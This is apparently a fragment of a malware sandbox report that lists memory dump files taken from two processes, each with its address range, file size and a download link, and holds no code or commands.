memory/3660-81-0x0000000002CF0000-0x0000000002D00000-memory.dmp

Filesize
64KB

Download
memory/3660-92-0x0000000002CF0000-0x0000000002D00000-memory.dmp

Filesize
64KB

Download
memory/3660-94-0x0000000074770000-0x0000000074F20000-memory.dmp

Filesize
7.7MB

Download
memory/3660-80-0x0000000074770000-0x0000000074F20000-memory.dmp

Filesize
7.7MB

Download
memory/4568-105-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/4568-97-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/4568-101-0x0000000010000000-0x00000000100E2000-memory.dmp

Filesize
904KB

Download